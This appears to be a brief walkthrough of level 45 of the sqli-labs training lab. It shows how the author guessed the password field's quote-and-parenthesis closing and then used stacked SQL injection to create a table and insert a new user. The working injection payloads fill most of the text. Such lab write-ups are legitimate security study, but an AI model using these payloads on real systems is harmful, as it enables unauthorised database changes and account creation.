sqli-labs (less-45)
Enter level 45, still the familiar page
. Enter admin' in the place of password.
There is no error message, so I can only guess one by one.
admin# #登入失败
admin'# #登入失败
admin')# #登入成功
Judge the closing mode as')#, and inject the character type
Here we directly use stack injection attack
Create a table
a');create table test like users;#
Create a new user
a');insert into users values(18,'icepeak','icepeak');#